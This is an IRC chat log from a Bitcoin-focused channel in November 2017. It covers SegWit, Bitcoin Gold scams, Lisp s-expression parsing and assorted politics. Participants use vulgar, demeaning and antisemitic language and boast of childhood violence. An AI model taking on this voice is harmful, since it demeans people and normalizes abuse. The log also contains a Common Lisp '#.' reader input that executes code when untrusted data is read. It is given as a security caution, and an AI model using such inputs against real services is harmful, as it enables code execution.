1741631;1511278682;*;mircea_popescu leaves http://btcbase.org/log/2017-09-12#1712865 next to http://btcbase.org/log/2017-11-21#1741614 for... i'm not even sure, everyone capable of knowing knows and everyone who doesn't know is not gonna find out anymore than my stove is gonna learn a merry jig. 1741632;1511278682;a111;Logged on 2017-09-12 21:08 rothbart: I've been trying to grok the segwit "theft" incentive - as the bounty grows, so does the PoW defending it - doesn't this keep the segwit outputs safe? 1741633;1511278682;a111;Logged on 2017-11-21 14:32 asciilifeform: 'the first SegWit address whose funds were recovered' 1741634;1511278707;mircea_popescu;remember back when "mp invented miner conspiracy" ? 1741635;1511278729;mircea_popescu;and can you believe the utter schmucktard still hasn't posted nude pics with appology scribbled in his own blood where his ballsac/eyes/etc used to be ? 1741636;1511278770;asciilifeform;schmucktard, last i heard, was resting on a sofa made of whores in thailand 1741637;1511278777;asciilifeform;and lacking for nothing 1741638;1511278785;mircea_popescu;if your stupid head causes you to stumble, CUT IT FUCKING OFF! http://trilema.com/2016/gangs-of-new-york/ style! 1741639;1511278818;mircea_popescu;asciilifeform you have this very strange "man is entirely made of extrinsic motivation" outlook. 1741640;1511278830;mircea_popescu;what the fuck does the sofa enter into any discussion of morals ? 1741641;1511278846;asciilifeform;in application to d00d who never showed any symptoms of intrinsic (i.e. theorems) -- yes 1741642;1511278896;asciilifeform;afaik kako had nothing that could be confused for morals. took the thirty pieces of silver, and living it up. 1741643;1511278915;asciilifeform;immediately when it was offered -- took. 1741644;1511279082;asciilifeform;funnily and coincidentally, it was happening at exactly the same time as, far away, asciilifeform refused to take 'top seekrit' holy orders for usg 'contractor' 1741645;1511279206;asciilifeform;but no, sofa does not enter discussion of morals other than in re 'the thirty pieces of silver, were in fact troo silver', evidently some quislings are paid handsomely, rather than left to flap on the wind esr-style 1741646;1511279360;mircea_popescu;i've no way to evaluate all this. 1741647;1511279362;asciilifeform;some people are only distinguished from 'short' pig in that they stand on two legs. and these in fact are made ~entirely of extrinsic motivation. 1741648;1511279378;asciilifeform;morals are in fact what remains when there is nothing else with which to evaluate... 1741649;1511279391;asciilifeform;i evaluated, thusly , that the man is a swine. 1741650;1511279402;mircea_popescu;i'm not even sure which exact schmucktard we're talking of, there were a bunch. 1741651;1511279422;asciilifeform;i immediately pictured kakobrekla, if it wasn't obvious 1741652;1511279429;mircea_popescu;ah. 1741653;1511279448;mircea_popescu;original comment applies equally well to the whole agitcamp. 1741654;1511279473;mircea_popescu;public or private, what fucking difference does it make that you were wrong ~privately~ ? still wrong, still gotta fix etc. 1741655;1511279521;asciilifeform;the segshitter's 'wrong' is deliberately crafted disinfo, for the consumption of redditards. why would they recant. 1741656;1511279536;asciilifeform;they see it as 'noble lie' etc. 1741657;1511279554;mircea_popescu;because wrong. 1741658;1511279579;asciilifeform;'even down's syndrome sufferers won't use a paypaltronic pseudobitcoin if offered naked, let's dress it up' 1741659;1511279716;asciilifeform;in-house they certainly http://btcbase.org/log/2014-08-16#798878 . betcha the sum of ~block rewards~ going into segshitness addrs to date is 0. 1741660;1511279716;a111;Logged on 2014-08-16 21:38 asciilifeform: it went entirely like the tale of gorbachev and andropov 1741661;1511279768;asciilifeform;( is it even protocolically possible.. ? ) 1741662;1511279797;shinohai;http://btcbase.org/log/2017-11-21#1741626 <<< http://segwit.5gbfree.com/countsegwit 1741663;1511279797;a111;Logged on 2017-11-21 15:34 asciilifeform: incidentally, anybody bother lately to add up how much anyonecanspendolade in typical block ? 1741664;1511279817;asciilifeform;shinohai: pretty useless, no COIN SUMS 1741665;1511280182;shinohai;hmmm 1741666;1511280425;mircea_popescu;no NET coins. 1741667;1511280436;mircea_popescu;nobody cares of sum as in a+a+a+a+a+a+a+a+a 1741668;1511280466;asciilifeform;in ~that~ sense most of the conventional coin 'movement' is spamola. 1741669;1511280469;asciilifeform;afaik to this day. 1741670;1511280488;asciilifeform;not even speaking of shitnesses. 1741671;1511280526;asciilifeform;virtually entire block mass for past... 3 ? yrs , is just about a+a+a+a+a+a+a+a+a. 1741672;1511280590;asciilifeform;ever since the 'let's fill up the blox with liquishit and push 'scalingism'' agenda was cooked up. 1741673;1511281040;mircea_popescu;right. 1741674;1511281055;mircea_popescu;http://trilema.com/2017/i-fucking-love-science-or-why-global-warming-wouldnt-produce-superhurricanes/#comment-123582 << in other breakfasrt physics 1741675;1511282258;ben_vulpes;!!up cruciform 1741676;1511282258;deedbot;cruciform voiced for 30 minutes. 1741677;1511282271;ben_vulpes;mircea_popescu: ever see "daisies", 1966 ? 1741678;1511282321;cruciform;jurov: http://log.mkj.lt/trilema/20171121/#124 - yes; sold mine recently @ HitBTC - very easy 1741679;1511282322;scriba;Logged on 2017-11-21: [14:05:15] also, there's "bitvoin gold" pump going too, apparently it's possible to exchange for BTC the same way as BCH, will be looking into it 1741680;1511282404;mircea_popescu;its on teh trilema. 1741681;1511282428;mircea_popescu;http://trilema.com/2014/daisies/ 1741682;1511282447;ben_vulpes;dang 1741683;1511282453;ben_vulpes;thanks 1741684;1511282879;mircea_popescu;cruciform gotta expose bitcoin addresses neh 1741685;1511282911;cruciform;mircea_popescu: yea; the exchange doesn't ID you though 1741686;1511282922;mircea_popescu;right. when was the cutoff date for this one ? 1741687;1511282930;cruciform;23rd Oct 1741688;1511282938;mircea_popescu;lol k. 1741689;1511282949;pete_dushenski;cruciform: which btg wallet did you use ? 1741690;1511282988;cruciform;their fork of the Core node from https://bitcoingold.org/downloads/ 1741691;1511283005;pete_dushenski;aha 1741692;1511283027;cruciform;pete_dushenski: thanks for your BCH article, btw - got me off the couch 1741693;1511283052;pete_dushenski;happy to help motivate 1741694;1511283150;pete_dushenski;"Bitcoin Gold Core is a full Bitcoin Gold client and builds the backbone of the network. It offers high levels of security, privacy, and stability. However, it has fewer features and it takes a lot of space and memory. 1741695;1511283153;pete_dushenski;" 1741696;1511283160;pete_dushenski;however!!1 1741697;1511283189;cruciform;there's already been a hack via the online sweeper they posted on their site 1741698;1511283210;cruciform;people posted their unswept BTC privkeys into it; lost their BTC 1741699;1511283223;pete_dushenski;lol ya that's what i heard too 1741700;1511283359;cruciform;at the least the scams are rapidly diminishing in SFYL damage to noobs: BCH > BTG > http://supersmartbitcoin.com/ 1741701;1511283402;cruciform;"Lightening Network 1741702;1511283402;cruciform;"Lightening Network" (TM) 1741703;1511283576;mircea_popescu;enlightening network. 1741704;1511284078;mircea_popescu;!!key cruciform 1741705;1511284079;deedbot;http://wot.deedbot.org/4E18288CAA6A98F4C51066053B6F4A8387D54AC6.asc 1741706;1511284090;mircea_popescu;!!rated cruciform 1741707;1511284090;deedbot;mircea_popescu has not rated cruciform. 1741708;1511284097;mircea_popescu;!!rate cruciform 1 Noob. 1741709;1511284100;deedbot;Get your OTP: http://p.bvulpes.com/pastes/NQhr6/?raw=true 1741710;1511284158;asciilifeform;http://btcbase.org/log/2017-11-21#1741698 <<< ahahahahaha this is a new level of dumb or wat 1741711;1511284158;a111;Logged on 2017-11-21 16:53 cruciform: people posted their unswept BTC privkeys into it; lost their BTC 1741712;1511284167;asciilifeform;'ismyprivkeyhacked.com' 1741713;1511284230;cruciform;mircea_popescu: nothing prepared me for the brainrot of BTCtalk BTG official thread 1741714;1511284242;mircea_popescu;lol 1741715;1511284645;BingoBoingo; BingoBoingo it's dangerous, that shit, esp in a country where the only style of maintenance is "is it broken y/n". << Quiero sus escalara de winch, no. Quiero mis escalera de winch, si. 1741716;1511284679;mircea_popescu;lol 1741717;1511284818;BingoBoingo;This happens. I see idea executed dangerously and poorly. Then "What if maintained and done better?" Often for many idiot things right means unreasonable, and then there is la escalara de winch. 1741718;1511284895;mircea_popescu;winchalera 1741719;1511285102;BingoBoingo;Ah, Como se dice esto! 1741720;1511286733;ben_vulpes;semi-relatedly, i went to build an extension cord for my dryer, ~all the old women at the hardwarestoremegachain insisted that i simply could not do what i was going to do 1741721;1511286859;asciilifeform;ben_vulpes: 30amp 220v cord dun come in 'extension' in usa, for the obvious reason that the cable dun come in real-copper and the socket dun come in non-chinese, ergo automatic fire hazard. 1741722;1511286882;asciilifeform;ben_vulpes: buy the plug, the actual-copper 30amp 4conductor cable, and make new cord, then attach to the internal bolts. 1741723;1511286892;asciilifeform;forget 'extension'. 1741724;1511286980;asciilifeform;this is sorta the pasteurized milk thread again, in different light. 'can't have unmolested milk, because ~must~ have caged cows, and ergo unmolested milk will killya' etc 1741725;1511287033;ben_vulpes;lol, precisely what i did 1741726;1511287081;ben_vulpes;leprosy cheese on the shit sandwich of american products is that the dryer power cable was not trivially replaceable, had to be extended. 1741727;1511287093;asciilifeform;why not replaceable ? 1741728;1511287102;asciilifeform;typically it's attached to lug bolts under the cover 1741729;1511287145;ben_vulpes;'trivially', did not want to start gentooing dryers as well 1741730;1511287153;ben_vulpes;when heater element goes, then, fine. 1741731;1511287166;asciilifeform;'trivially' in the sense where you dun need any higher tech than screwdriver 1741732;1511287191;ben_vulpes;oh also receptacle is very high on the wall, extending made it a guaranteed fit, replacing woulda been tight borderline not-workable. 1741733;1511287229;ben_vulpes;asciilifeform: and move dryer, and and and all sorts of unknowns, vs just buy receptacle while also buying pigtail. 1741734;1511287299;asciilifeform;ah then you've made the chinese cord for yerself, lol 1741735;1511287657;ben_vulpes;well it's a rated pigtail, copper through and through 1741736;1511287696;asciilifeform;socket more often the problem. 1741737;1511288033;BingoBoingo;Socket or cable you spliced extension to. 1741738;1511288510;mircea_popescu;http://btcbase.org/log/2017-11-21#1741722 << this is the only correct approach. 1741739;1511288510;a111;Logged on 2017-11-21 17:54 asciilifeform: ben_vulpes: buy the plug, the actual-copper 30amp 4conductor cable, and make new cord, then attach to the internal bolts. 1741740;1511288517;mircea_popescu;even "high quality" commercial couplings will heat up. 1741741;1511289407;asciilifeform;in other noose, ffa elf on x86-64 with no inlinings and stripped .a , is ~50kB 1741742;1511289420;asciilifeform;gnarly but within the bounds of the readable 1741743;1511289433;asciilifeform;( with inlinings, ~150 ) 1741744;1511289447;mod6;inline triples it 'eh 1741745;1511289455;asciilifeform;somewhat unsurprisingly 1741746;1511289480;asciilifeform;( for max speed you want ~0 function calls at all, if possible, for so long as the thing still fits in cache ) 1741747;1511289599;asciilifeform;i will add that the bounds checking code , which we have because idjit pc arch , dwarfs the actual algos 1741748;1511289962;mod6;you were saying as much yesterday iirc 1741749;1511289983;asciilifeform;mod6: 'validity' check is a separate item 1741750;1511290005;asciilifeform;and safe to switch off if (and only if) you can prove that there are at no point uninitialized variables read 1741751;1511290024;asciilifeform;theoretically the same applies to other bounds checks, but the proof is a much trickier matter 1741752;1511290321;asciilifeform;( granted, it is not an ~impossible~ matter, as it would be if the proggy had been written in pointerlang. but merely ~difficult~. ) 1741753;1511292851;phf;http://btcbase.org/log/2017-11-20#1741053 << i'm not part of the amphetamine culture. i like to sleep 1741754;1511292851;a111;Logged on 2017-11-20 03:40 pete_dushenski: http://btcbase.org/log/2017-11-19#1740754 << am i the only one who can't read "dex" without thinking "dexedrine" ? phf ? 1741755;1511292904;phf;http://btcbase.org/log/2017-11-20#1741176 << i don't need to consider that, i grok metacircularity, i.e. there's no such thing as builtin symbols. bytecode or not is lateral to that point. 1741756;1511292904;a111;Logged on 2017-11-20 12:19 spyked: http://btcbase.org/log/2017-11-14#1737923 <-- also, spyked's adalisp is missing more fundamental things, such as closures. it's an early prototype, barely usable, but > 0. interning is of course considered, but not added yet. anyway, phf, consider the following point: built-in symbols (car, cons, etc.) still have to point *somewhere*, and that somewhere must not be addressed in a C-machine style! symbols should point to Lisp memory (via 1741757;1511292922;phf;http://btcbase.org/log/2017-11-20#1741280 << it doesn't, logotron necessarily has to interpret the nature of bytes (because the display layer is explicitly encoded). so the log collection and storage is 8 bit clean, but display makes assumpetions for rendering purpose. specifically i assume that log is utf8, but if utf8 decoder fails on line, i fall back to latin-1 (this is a traditional irc mechanism, details of which have been discussed) 1741758;1511292922;a111;Logged on 2017-11-20 14:57 asciilifeform: pretty sure his ( and others ) give back the bytes that were put in ( which imho is correct behaviour ) 1741759;1511293124;phf;http://btcbase.org/log/2017-11-20#1741179 << you can just ignore the whole "string" question in first version, McCarthy's lisp used symbols instead of strings (that's why early nlp code, like eliza all come out as DOG SAID, HELLO) and the only operation you could do at some point was read and eq. 1741760;1511293124;a111;Logged on 2017-11-20 12:21 spyked: http://btcbase.org/log/2017-11-14#1737956 <-- but lists are sequences too, and strings can be represented as lists. this becomes problematic when O(1) random accesses are needed. if/when that happens, I will have to implement arrays, but until then... strings are lists-of-characters. 1741761;1511293191;phf;strings as lists of character is a schemist wankery anyway along the "our cpu uses church numerals!1" 1741762;1511294061;phf;http://btcbase.org/log/2017-11-20#1740959 << i think i said that in logs before, but sexp is a poor data exchange format. read operation relies on current state of *readtable* and traditionally readtable is customized to specific operator needs. there's a default *readtable*, but it's too unconstrained to be used for deserialization of untrusted data, since it, for example, supports arbitrary code execution, circular structures, etc. 1741763;1511294061;a111;Logged on 2017-11-20 01:15 mircea_popescu: let's also see if phf wants to add nething. 1741764;1511294187;phf;we can of course specify our own subset of sexp that we use for interchange (along the lines of what http://www.islisp.info/ did) but that comes with all the "specify our own interchange format" caveats 1741765;1511294223;asciilifeform;phf: programmable readtables belong in the harem. 1741766;1511294305;asciilifeform;and wtf 'arbitrary code execution', you read it in a null environment 1741767;1511294311;asciilifeform;whole thing quoted. 1741768;1511294317;phf;asciilifeform: wut. 1741769;1511294350;phf;(read-from-string "#.(format t \"hello, world~%\")") 1741770;1511294397;phf;there's no such thing as a standard sexps. sure (foo "bar" 1.2) but #\abc or #x123 exist in the same realm as #.(...) 1741771;1511294471;trinque;*read-eval* nil << not enough? 1741772;1511294474;asciilifeform;i see 0 reason to have #. be bound when reading untrusted sexprs. 1741773;1511294592;phf;trinque: the point is about exchange standard, rather than effect. we can also follow eran gatt's approach and specify a *safe-readtable* 1741774;1511294863;asciilifeform;and noshit gotta specify own format. using readtable with #. in it is lunacy 1741775;1511294883;asciilifeform;i dun see what part of that is nonobvious 1741776;1511294920;phf;as they say in russia, флаг в руки 1741777;1511294959;asciilifeform;большому кораблю и карты в руки. 1741778;1511294987;phf;http://btcbase.org/log/2017-11-21#1741765 <<>> http://btcbase.org/log/2017-11-21#1741774 1741779;1511294987;a111;Logged on 2017-11-21 19:57 asciilifeform: phf: programmable readtables belong in the harem. 1741780;1511294987;a111;Logged on 2017-11-21 20:07 asciilifeform: and noshit gotta specify own format. using readtable with #. in it is lunacy 1741781;1511295068;asciilifeform;could even formulate the very definition of a forum, as a set of folx who agree on a minimal readtable. 1741782;1511295083;asciilifeform;( which will not include #. because then all bets off. ) 1741783;1511295126;phf;also probably want to not have #s because that requires a state of the environment 1741784;1511295176;phf;you also want to have a custom symbol reader, because reading cl::foo is going to explode with a "locked package" error 1741785;1511295294;asciilifeform;wat's wrong with scheme-style simple state machine that knows when to cons a new cell , where symbol names begin/end, and which becomes the car/cdr . 1741786;1511295375;phf;http://btcbase.org/log/2017-11-21#1741764 1741787;1511295375;a111;Logged on 2017-11-21 19:56 phf: we can of course specify our own subset of sexp that we use for interchange (along the lines of what http://www.islisp.info/ did) but that comes with all the "specify our own interchange format" caveats 1741788;1511295414;asciilifeform;this is more or less a given. what was the last heathen artifact that we found usable exactly as found? i can't recall even one 1741789;1511295439;phf;tits 1741790;1511295453;asciilifeform;i bet mircea_popescu patches those!111 1741791;1511299227;whaack;!!v BD54238F24F1EEA35BBB222E00527E4B8D5141BD47ABF118BC5C2023D0EE2DD5 1741792;1511299227;deedbot;whaack rated ben_vulpes 2 << friendly and helpful republican with knowledge of the sewers of the web 1741793;1511299354;whaack;http://btcbase.org/log/2017-11-21#1741626 << From my cursory understanding of the segwit system there's no way to know if coins are in a segwit address until it is spent. It is effectively of the nature where you must know x in h(x) for the coins to be spent, so a miner cannot snag the coins until the segwitter tries to spend. 1741794;1511299354;a111;Logged on 2017-11-21 15:34 asciilifeform: incidentally, anybody bother lately to add up how much anyonecanspendolade in typical block ? 1741795;1511299535;asciilifeform;whaack: not difficult to add up all of the various 'softfork' liquishit tho -- it shows up as 'cannot decode' on ben_vulpes's blockviewer 1741796;1511302752;ben_vulpes;> two attackers accessed a private GitHub coding site used by Uber software engineers and then used login credentials they obtained there to access data stored on an Amazon Web Services account that handled computing tasks for the company...Later, they emailed Uber asking for money. 1741797;1511302756;ben_vulpes;there's yr rape, asciilifeform 1741798;1511302759;ben_vulpes;https://www.bloomberg.com/news/articles/2017-11-21/uber-concealed-cyberattack-that-exposed-57-million-people-s-data 1741799;1511303113;shinohai;bwahahahaha 1741800;1511304623;asciilifeform;pretty great. 1741801;1511304659;ben_vulpes;> the founders series roadster will cost buyers a 250K down payment even though it's not coming for more than two years 1741802;1511304677;ben_vulpes;fucking 'founders series' vehicle by a company trading on the public markets, give me a breka 1741803;1511304683;ben_vulpes;break* 1741804;1511305522;*;BingoBoingo has today acquired place to office through December $311 bezzel bucks and place to sleep $400 through December 26th. 1741805;1511305533;asciilifeform;notbad. 1741806;1511305599;BingoBoingo;Office comes with 24/7 access, lockable storage, and fiscal address acceptable for corporationing. All locations within 10 minute walk of building with rack. 1741807;1511306095;ben_vulpes;very cool BingoBoingo 1741808;1511306120;ben_vulpes;in other uproariously hilarious things: https://www.propublica.org/article/facebook-advertising-discrimination-housing-race-sex-national-origin 1741809;1511306152;ben_vulpes;facebook builds ad platforms that lets you target people based on skin color and income among a zillion other things, this is all great until people start advertising housing to whites 1741810;1511306156;ben_vulpes;fuckin dying over here 1741811;1511307527;BingoBoingo;lol 1741812;1511307867;asciilifeform;see also http://btcbase.org/log/2015-02-24#1031629 1741813;1511307867;a111;Logged on 2015-02-24 03:47 asciilifeform: housing and discrimination etc << the bans on 'asking wrong question' were enthusiastically pushed by the real estate racket, who were all too happy to have price become the one and only legal selector 1741814;1511307995;asciilifeform;( and http://btcbase.org/log/2014-05-09#668189 , http://btcbase.org/log/2014-05-09#668203 , possibly elsewhere. ) 1741815;1511307995;a111;Logged on 2014-05-09 19:48 asciilifeform: one other thing about housing in usa - that is rarely spoken of in the open literature - is that the americans switched to housing price as a means of putting the '60-70s race wars on hold 1741816;1511307995;a111;Logged on 2014-05-09 19:51 asciilifeform: the reason why no experiment whatsoever with cheap housing en-masse is possible in usa, is that any locale with such becomes 'infested' overnight 1741817;1511308061;asciilifeform;nobody would even contemplate paying the ludicrous 500k-1mil usd for a motherfucking cardboard box, other than at gunpoint. 1741818;1511308091;asciilifeform;the gunpoint conveniently provided by usg's unofficial footsoldiers. 1741819;1511308287;asciilifeform;'Under its own policies, Facebook should have flagged these ads, and prevented the posting of some of them. Its failure to do so revives questions about whether the company is in compliance with federal fair housing rules, as well as about its ability and commitment to police discriminatory advertising on the world’s largest social network.' << ohnoez, plebes illicitly trying to practice freedom of association 1741820;1511308302;mircea_popescu;heh 1741821;1511308303;asciilifeform;i.e. the ultimate crime under the inca. 1741822;1511308332;mircea_popescu;recall when they started bussing kids to school lest you know, family ties survive or some such 1741823;1511308338;asciilifeform;aaha. 1741824;1511308355;asciilifeform;and how the brahmins transfered their spawn to private schools the day prior. 1741825;1511308363;mircea_popescu;i like how indignant screen gets. this IS window 6!!! 1741826;1511308503;asciilifeform;lol 1741827;1511309338;trinque;heh, I was sent to a black elementary school under some kind of diversity program. 1741828;1511309341;trinque;and look, I turned out fine 1741829;1511309394;asciilifeform;and asciilifeform grew up in orcistan with tetraethyl-pb petrol, also 'turned out fine', lol 1741830;1511309411;asciilifeform;dun make te-pb a great thing. 1741831;1511309429;*;trinque recalibrates his sarcasm emitter 1741832;1511309458;shinohai;"This is what *not* to do!" 1741833;1511309467;ben_vulpes;leaded gas is AWESOME. 1741834;1511309473;ben_vulpes;unbelieeeevable specific heat 1741835;1511309478;trinque;I mean, they wanted me to have a cultural experience outside my own, and... did. 1741836;1511309486;asciilifeform;ben_vulpes: ~0 effect on specific heat 1741837;1511309509;asciilifeform;trinque: ahahahaha in that sense it's great. i'm pretty happy i went to one in usa 1741838;1511309520;asciilifeform;lifetime vaccine against equalism. 1741839;1511309526;trinque;aha 1741840;1511309535;ben_vulpes;aaaaah right 1741841;1511309540;trinque;I even got almost expelled for racis 1741842;1511309553;trinque;beat the fuck out of some kid that stole my recess hat, threw to friend 1741843;1511309560;trinque;I guess in the movie, kid goes and runs to friend to get the hat 1741844;1511309565;trinque;I just beat his face in 1741845;1511309811;BingoBoingo; lifetime vaccine against equalism. << AHA, I ad to get vaccinated later at college for that 1741846;1511310171;mircea_popescu;trinque the theory isn't that it actually does anything ; the idea is that the ~reason~ they thought they're doing it was pretty dumb. 1741847;1511310280;mircea_popescu;the most amusing example being that in 1817, back when "miscegenation" was a serious offence, and in 2017, when "bbc" is kinda fashionable, the prevalence of black-white mixed kids born was ~same. cuz exogamy is a behaviour and society is a blather, guess which comes later. 1741848;1511310320;asciilifeform;the actual reason is the one described in 'death of the american city' -- j00z & puritans allied to nuke the irish and polish catholics in usa 1741849;1511310335;mircea_popescu;sure. and ended up with vietnamese nationalism. 1741850;1511310337;asciilifeform;set up the necessary blathers, 'movements', etc. 1741851;1511310343;mircea_popescu;or w/e, serbs. 1741852;1511310408;mircea_popescu;trinque> I just beat his face in << better strategy. "bitch, by the time i'm done with you, your mom's gonna be begging to bring me my hat in her snatch every weekend after nine." 1741853;1511310666;mircea_popescu;http://btcbase.org/log/2017-11-21#1741741 << this is pretty good tbh. 1741854;1511310666;a111;Logged on 2017-11-21 18:36 asciilifeform: in other noose, ffa elf on x86-64 with no inlinings and stripped .a , is ~50kB 1741855;1511310725;asciilifeform;relatedly, asciilifeform sawed ffa into independent subunits ( e.g. mults, bitops, divides, etc. ) for smooth compilation, reading, and blogomatics. 1741856;1511310741;mod6;cool 1741857;1511310747;asciilifeform;will become a series of essays-cum-coad 1741858;1511310771;asciilifeform;also moved from make to gprbuild 1741859;1511310795;asciilifeform;( ditches the gnumake dependency, and much shorter and more makessensical process ) 1741860;1511310805;mircea_popescu;http://btcbase.org/log/2017-11-21#1741759 << this is actually a good point. 1741861;1511310805;a111;Logged on 2017-11-21 19:38 phf: http://btcbase.org/log/2017-11-20#1741179 << you can just ignore the whole "string" question in first version, McCarthy's lisp used symbols instead of strings (that's why early nlp code, like eliza all come out as DOG SAID, HELLO) and the only operation you could do at some point was read and eq. 1741862;1511310812;mircea_popescu;string is not a primitive! 1741863;1511311001;mircea_popescu;http://btcbase.org/log/2017-11-21#1741773 << i thought this was the idea. 1741864;1511311001;a111;Logged on 2017-11-21 20:03 phf: trinque: the point is about exchange standard, rather than effect. we can also follow eran gatt's approach and specify a *safe-readtable* 1741865;1511311309;mircea_popescu;http://btcbase.org/log/2017-11-21#1741789 << my bills for plastic surgery exceed my bills for vehicle mainenance. 1741866;1511311309;a111;Logged on 2017-11-21 20:17 phf: tits 1741867;1511311349;mircea_popescu;fuck, literally next line 1741868;1511311423;BingoBoingo;4srs! 1741869;1511311436;mircea_popescu;http://btcbase.org/log/2017-11-21#1741801 << this inept socialist empire's vehicular nonsense is starting to sound a lot like the fabled stories of teh romanian socialist republic. 1741870;1511311436;a111;Logged on 2017-11-21 22:50 ben_vulpes: > the founders series roadster will cost buyers a 250K down payment even though it's not coming for more than two years 1741871;1511311488;mircea_popescu;i tell the girls stories, you know, "to get a car in the 80s you had to deposit 80k lei in this so and so account, and then 8 to 18 months later they'd call you TO THE PLANT and you'd get, mostly, a car. of whatever color they had available and maybe with all the parts. there were no fucking showrooms or anything, people drove the car home 500 kms. 1741872;1511311557;mircea_popescu;and you showed up like for the draft, paper in hand and specified comcast-style times. "between 8 and 17". people fucking camped at the plant. 1741873;1511311589;asciilifeform;holyfuq that's fast 1741874;1511311595;asciilifeform;in su some folx waited decade+ 1741875;1511311607;mircea_popescu;ro had large factory at pitesti 1741876;1511311615;mircea_popescu;proportionally 10x than the ru things, because smaller pop. 1741877;1511311620;asciilifeform;i suspected. 1741878;1511311654;mircea_popescu;made to the tune of 1,5k a day or such, respectable altogether. 1741879;1511311682;mircea_popescu;(mostly 70s tech, no robotics, no etc.) 1741880;1511311685;asciilifeform;and while i'd hesitate to time travel to 'golden age' su, i'd almost happily move to shoemaker-era ro 1741881;1511311698;asciilifeform;quite civilized compared to current-day monkeylandia 1741882;1511311730;mircea_popescu;depends. 80s were insufferable (but, according to eg stanculescu, still better than ru). 70s were supposedly great. 60s ro was ahead of the post-war pack, but still... europe. even the french had malnutrition. 1741883;1511311827;mircea_popescu;but take this forinstance : thorouyghly hated politician active these days MADE his own fucking ARO (70s romanian SUV). OUT OF PARTS. WHICH HE BOUGTH. 1741884;1511311842;asciilifeform;nifty. 1741885;1511311857;mircea_popescu;people did that sort of thing, back then. and all the fuckbook tards who paint the dude (rightfully or not, i don't give a shit) as the summum malum never as much as put together a fucking lego box. 1741886;1511311871;asciilifeform;which one is this, ro's eltsin ? 1741887;1511311876;mircea_popescu;so i do feel an inclination to just drive them over. 1741888;1511311881;mircea_popescu;nah 1741889;1511311885;mircea_popescu;lemme dig him up 1741890;1511311958;mircea_popescu;!~google liviu dragnea 1741891;1511311959;jhvh1;mircea_popescu: Liviu Dragnea - Wikipedia: ; Liviu Dragnea - POLITICO: ; Liviu Dragnea - Home | Facebook: 1741892;1511311975;asciilifeform;how come hated ? 1741893;1511311987;mircea_popescu;!~google aro ims 1741894;1511311988;jhvh1;mircea_popescu: ARO M461 - Wikipedia: ; ARO IMS - Wikipedia: ; ARO - Wikipedia: 1741895;1511311992;mircea_popescu;^ there, suv. 1741896;1511312013;mircea_popescu;asciilifeform cuz head of the reds, ie, vaguely left-centrists. but rather, because somewhat opposite to usg party. 1741897;1511312020;asciilifeform;aaa 1741898;1511312027;asciilifeform;so Officially Bad 1741899;1511312056;mircea_popescu;well, facebook bad. 1741900;1511312065;mircea_popescu;they keep gaining majorities at the ballots. 1741901;1511312070;asciilifeform;and that thing looks quite drivable. something like a willis. 1741902;1511312090;mircea_popescu;it started as a straight gaz clone 1741903;1511312111;mircea_popescu;then the romanians added 10% hp / 10% speed etc five years later. then added 15% more five years later. and so on 1741904;1511312136;mircea_popescu;eventually late 70s incarnations looked exactly like the early nissan suvs. of the 90s. 1741905;1511312175;mircea_popescu;!~google aro 24 series 1741906;1511312176;jhvh1;mircea_popescu: ARO 24 Series - Wikipedia: ; ARO 24 Series models - autoevolution: ; ARO 24 - YouTube: 1741907;1511312348;mircea_popescu;http://btcbase.org/log/2017-11-21#1741804 << what's that, like 400 a month to lay down your head ? 1741908;1511312348;a111;Logged on 2017-11-21 23:05 BingoBoingo has today acquired place to office through December $311 bezzel bucks and place to sleep $400 through December 26th. 1741909;1511312391;BingoBoingo;Just about, in a hostel, during high tourist season. 1741910;1511312423;BingoBoingo;Sometime late february to March price goes down substantially 1741911;1511312469;mircea_popescu;not bad start. find a shared apt deal among the students after, will be cheaper in the sense of paying for itself via roommates. 1741912;1511312496;mircea_popescu;"rent is 100 but i don't have to spend 150 to get language lessons, o noes, im 50 in the green here" 1741913;1511312515;BingoBoingo;Right. This arrangement comes with roommates through accident of having booked bed at same place. Also comes with breakfast. 1741914;1511312525;mircea_popescu;sounds pretty good. 1741915;1511312531;mircea_popescu;ah if only i were young again! 1741916;1511312540;mircea_popescu;and all the world were new! 1741917;1511312553;mircea_popescu;an' hoot for boot an' horse, son, and... 1741918;1511312557;mircea_popescu;i forget the rest. 1741919;1511312574;BingoBoingo;Next nearest place with similar setup is on other side of Pocitos neightborhood, while this one is across street and around block from World Trade Center 1741920;1511312634;BingoBoingo;The co working space is a block still further. The mall is a block to the north. The Pocitos and Buceo playas are equidistant. 1741921;1511312688;mircea_popescu;so i go into shop that has you know, coffee toaster and a buncha nuts etc, and go "camarron ?" and the woman looks at me befuddled, so i'm like "semillas de camarron!" and she's eyeing me like wtf then realises. "maranon ?" 1741922;1511312693;mircea_popescu;"oh. yyyeeeah..." 1741923;1511312735;mircea_popescu;cafe trebol sa. would shrimp there again! 1741924;1511312890;BingoBoingo;Anyways, explaining to normal ordinary people in meatspace who Mircea Popescu is, is surprisingly simple. 1741925;1511312895;mircea_popescu;asciilifeform meanwhile original author found item for me : http://www.jeg.ro/titlul-mortii 1741926;1511312901;mircea_popescu;BingoBoingo o ya ? 1741927;1511312929;mircea_popescu;oh, in other lulz : costa rica failed to send anyone to miss universe competition (some indian midget won in china). on the basis of observed data... this is correct. 1741928;1511312930;BingoBoingo;"He's a Romanian living in Costa Rica" "Why? Because he can. You would if you could too." 1741929;1511312949;mircea_popescu;BingoBoingo *you would if you could import the fresh tuna. 1741930;1511312962;BingoBoingo;Falls under could 1741931;1511313023;BingoBoingo;"How did he make his money?" "Communism fell, there was money running porn studios in the 1990's, and now he alternately builds and unbuilds empires" 1741932;1511313058;mod6;spare time deal 1741933;1511313072;asciilifeform;meeeaanwhile in failed experiments, asciilifeform tried to take an xray of the bolix-ivory die, so as to get moar realistic microscopy quote at some point. method : ra-226 capsule (commercial geiger test src), b&w 'polaroid' film. weakness turns out to be the latter : when developed using rolling pin, fixer pouch bursts, and result is liquishit 1741934;1511313092;mircea_popescu;bs polaroid. 1741935;1511313095;mircea_popescu;get proper bw film. 1741936;1511313134;mircea_popescu;and a bath, you won't die out of bw bathing ffs. 1741937;1511313241;asciilifeform;next will suggest , betcha, an actual xray machine 1741938;1511313244;asciilifeform;and dark room, lol. 1741939;1511313281;mircea_popescu;bathroom in most us places works as dark room, screw in red light plug the window if it exists. 1741940;1511313292;mircea_popescu;but, yes. 1741941;1511313308;mircea_popescu;asciilifeform used to be reactives were expensive. no more. proper bath, listen to me. 1741942;1511313356;asciilifeform;http://www.loper-os.org/pub/sad_polaroid.jpg 1741943;1511313378;mircea_popescu;hela. 1741944;1511313383;asciilifeform;lol 1741945;1511313392;asciilifeform;btw this is approx same as what they look like if burst unexposed. 